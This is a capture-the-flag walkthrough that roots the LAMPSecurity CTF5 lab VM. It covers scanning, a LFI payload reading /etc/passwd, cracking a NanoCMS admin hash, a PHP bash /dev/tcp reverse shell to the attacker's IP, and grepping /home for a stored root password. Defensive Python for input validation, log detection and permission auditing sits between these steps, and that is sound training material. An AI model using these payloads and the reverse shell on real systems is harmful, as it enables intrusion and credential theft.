- VM: LAMPSecurity: CTF5
- Goal: Gain root access
- Approach: solve without automated exploitation tools
Target Discovery
nmap -sn 192.168.172.200-254

Port Scanning
nmap -p- -A 192.168.172.240

- Port 22: OpenSSH 4.7
- Port 25: SMTP
- Port 80: Apache httpd 2.2.6
- Port 110: pop3 ipop3d 2006k.101
- Port 111: RPC #100000
- Port 139: Samba smbd 3.X – 4.X (workgroup: MYGROUP)
- Port 143: University of Washington IMAP imapd 2006k.396
- Port 445: Samba 3.0.26a-6.fc8
- Port 901: Samba SWAT administration server
- Port 3306: MySQL 5.0.45
Enumeration
There are quite a few ports open. First, let's check out the website.

I tested the site for SQL injection but didn't find any.
I then identified an LFI (local file inclusion) vulnerability in the page parameter:
http://192.168.172.240?page=../../../../etc/passwd%00
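The root cause of this LFI is a page parameter that is passed to an include with no validation, so a traversal sequence plus a %00 terminator reaches the filesystem untouched. As an added illustration (not code from the writeup or from the target's PHP), the following Python shows the validation such a parameter should get: an allowlist of plain page names, an explicit NUL-byte check, and a realpath containment check as a second line of defence. The pages directory layout (base_dir/<name>.php) is an assumption.

```python
import os
import re

# Only plain page names are accepted: letters, digits, underscore, hyphen.
# Slashes, dots, NUL bytes and percent-escapes never reach the filesystem.
PAGE_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


class PageNotAllowed(ValueError):
    """Raised when a requested page name is rejected."""


def resolve_page(base_dir, page):
    """Map a user-supplied ?page= value to a file inside base_dir.

    base_dir is the directory holding the site's page templates (assumed
    layout: base_dir/<name>.php). page is the already-URL-decoded query value,
    so a %00 in the request arrives here as a real NUL byte.
    """
    if page is None or "\x00" in page:
        raise PageNotAllowed("empty page name or embedded NUL byte")
    if not PAGE_NAME_RE.fullmatch(page):
        raise PageNotAllowed("page name contains characters outside the allowlist")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, page + ".php"))
    # Defence in depth: even if the allowlist were loosened later, the
    # resolved file must still sit directly inside the pages directory.
    if os.path.dirname(candidate) != base:
        raise PageNotAllowed("resolved path escapes the pages directory")
    return candidate


def is_allowed(base_dir, page):
    """Convenience wrapper returning True/False instead of raising."""
    try:
        resolve_page(base_dir, page)
        return True
    except PageNotAllowed:
        return False


if __name__ == "__main__":
    base = "/var/www/pages"  # assumed location; it does not need to exist
    for value in ["about", "../../../../etc/passwd\x00", "foo/../bar", "about.php"]:
        print(repr(value), "->", is_allowed(base, value))
```

The allowlist alone would stop the request shown above; the realpath check is there so that a later relaxation of the allowlist (for example to permit subdirectories) cannot silently reintroduce traversal.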

Further checking shows that the website is using NanoCMS for blogging (Blog tab).

A quick Google search for NanoCMS vulnerabilities showed that /data/pagesdata.txt exposes the password hash. Trying it on the website returned the file with the password hash.
http://192.168.172.240/~andy/data/pagesdata.txt

username: admin, password hash: 9d2f75377ac0ab991d40c91fd27e52fd
The hash has 32 hex characters, so it is most likely an MD5 hash. I used the website md5decrypt.net and was able to find the password quickly: shannon
username: admin, password: shannon
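Both enumeration steps above leave clear traces in the web server's access log: a traversal sequence with a %00 in the page parameter, and a successful (200) fetch of NanoCMS's pagesdata.txt. As an added example, not part of the writeup, here is a small Python triage script that parses combined-format access log lines, URL-decodes the request target (repeatedly, so double-encoded traversal is caught) and flags the request patterns used in this walkthrough. The sample log lines are constructed to mirror the requests above.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined"-style access log line, enough fields for triage.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines modelled on the requests in this writeup.
SAMPLE_LOG = [
    '192.168.172.110 - - [15/Jun/2020:10:01:02 +0000] "GET /?page=about HTTP/1.1" 200 1532',
    '192.168.172.110 - - [15/Jun/2020:10:01:09 +0000] "GET /?page=../../../../etc/passwd%00 HTTP/1.1" 200 2104',
    '192.168.172.110 - - [15/Jun/2020:10:02:30 +0000] "GET /~andy/data/pagesdata.txt HTTP/1.1" 200 874',
    '192.168.172.110 - - [15/Jun/2020:10:03:00 +0000] "GET /~andy/ HTTP/1.1" 200 3201',
]


def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so %252e%252e%2f is seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return the list of rule names that a raw request target trips."""
    rules = []
    decoded = fully_decode(target)
    path = decoded.split("?", 1)[0].lower()
    if "\x00" in decoded:
        rules.append("null-byte")
    if "../" in decoded or "..\\" in decoded:
        rules.append("path-traversal")
    if "/etc/passwd" in decoded.lower() or "/etc/shadow" in decoded.lower():
        rules.append("sensitive-file")
    if path.endswith("/data/pagesdata.txt"):
        rules.append("nanocms-data-file")
    return rules


def scan_access_log(lines):
    """Parse each line and return an alert dict for every request that trips a rule."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        rules = classify_request(m.group("target"))
        if rules:
            alerts.append({
                "ip": m.group("ip"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "rules": rules,
            })
    return alerts


if __name__ == "__main__":
    for a in scan_access_log(SAMPLE_LOG):
        print(a["ip"], a["status"], ",".join(a["rules"]), a["target"])
```

The status code matters when triaging: a 200 on the pagesdata.txt request means the data file really is being served and the fix (deny access to the CMS data directory in the web server configuration) is overdue, whereas a 403 or 404 only tells you someone looked.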
Exploitation
All right. Good start. Let's try to log in at the Admin Login of Andy's Blog page. Sure enough, the login to the NanoCMS Admin Panel succeeds.

I looked around the Admin Panel and quickly spotted something very interesting: ‘New Page’. Looks like I can create new blog pages there. I quickly created a new blog page with simple PHP code to test whether PHP code execution is allowed.

I added the page and then clicked on the new blog page ‘Testing’ under Pages & Options.

Awesome. PHP code execution is allowed.
Limited Shell
We can use PHP code execution to create a reverse shell. First, start Netcat on the Kali box listening on port 4444:
nc -lp 4444
Then modify the Testing blog page content to the following (note: the Kali box IP address is 192.168.172.110):
<?php system("bash -i >& /dev/tcp/192.168.172.110/4444 0>&1"); ?>
Now refresh the Testing blog page again and observe the Kali box:

That's great. We got shell access as user apache.
Privilege Escalation
With shell access, we search around the system for useful information to gain root access. That includes sudo usage, setuid commands, configuration files and users' files.
Luckily, we come across the root password while searching recursively for 'password' in the /home directory using the following command:
grep -R -i password /home/* 2> /dev/null

Looks like the .note file in patrick's folder may contain the root password.
cat /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note

Root password: 50$cent
Let's try it out.

Bingo! Root access.
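What made this escalation possible is not the grep itself but that a note in patrick's home directory was readable by the apache user: the home directory and its subdirectories were traversable by everyone and the file was world-readable. As an added example (not from the writeup), the Python below audits a /home-style tree the way a defender would: it walks only into directories that "other" can traverse, reads only files that "other" can read, and reports the ones containing something that looks like a written-down password. It builds its own throwaway directory tree with constructed contents, so it runs offline; the file names and the credential regex are assumptions.

```python
import os
import re
import shutil
import stat
import tempfile

# Lines that look like a credential written down in a plain text file.
CRED_RE = re.compile(r"(?i)\b(password|passwd|pass|pw)\b\s*[:=]\s*\S+")


def other_can_traverse(root, dirpath):
    """True if 'other' has the execute bit on every directory from root down to dirpath."""
    chain = [root]
    rel = os.path.relpath(dirpath, root)
    if rel != ".":
        cur = root
        for part in rel.split(os.sep):
            cur = os.path.join(cur, part)
            chain.append(cur)
    return all(os.stat(d).st_mode & stat.S_IXOTH for d in chain)


def audit_home(root, max_bytes=64 * 1024):
    """Return relative paths of files under root that any local user could read
    and that contain something resembling a written-down password."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if not other_can_traverse(root, dirpath):
            dirnames[:] = []  # nothing below here is reachable by 'other'
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_IROTH:
                continue
            try:
                with open(path, "rb") as fh:
                    text = fh.read(max_bytes).decode("utf-8", "replace")
            except OSError:
                continue
            if CRED_RE.search(text):
                findings.append(os.path.relpath(path, root))
    return sorted(findings)


def build_fixture():
    """Construct a throwaway /home look-alike with the permission mix seen in the writeup."""
    root = tempfile.mkdtemp(prefix="home-audit-")
    os.chmod(root, 0o755)  # /home itself is normally world-traversable
    files = {
        # world-readable note inside a world-traversable home: the finding
        "patrick/.tomboy/alpha.note": ("<note>root password: CONSTRUCTED-VALUE</note>", 0o644),
        # same content, but owner-only file: not exposed
        "patrick/private.txt": ("password: CONSTRUCTED-VALUE", 0o600),
        # harmless world-readable file: no match
        "patrick/todo.txt": ("buy milk", 0o644),
        # readable file, but its home directory is 0700: not reachable
        "andy/creds.txt": ("password = CONSTRUCTED-VALUE", 0o644),
    }
    for rel, (content, mode) in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    for d in ("patrick", "patrick/.tomboy"):
        os.chmod(os.path.join(root, d), 0o755)
    os.chmod(os.path.join(root, "andy"), 0o700)
    return root


def run_demo():
    """Build the fixture, audit it, clean up, and return the findings."""
    root = build_fixture()
    try:
        return audit_home(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in run_demo():
        print("exposed credential-like content:", finding)
```

Only patrick's note is reported: the owner-only file and the file under a 0700 home are unreachable to the apache user even though their contents match. The corresponding fix on the target is to set home directories to 0700 (or at least remove the world bits from application data like .tomboy) and to stop storing the root password in a note at all.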
Thank you Author madirish2600 for the box LAMPSecurity: CTF5
richa
29 Apr 2020
grep -R -i password /home/* 2> /dev/null
can you please explain this command
Alan Chan
21 May 2020
It searches for files in folder /home recursively that contain the text ‘password’.
-R: recursively
-i: case insensitive
2> /dev/null: do not display errors (e.g. permission denied)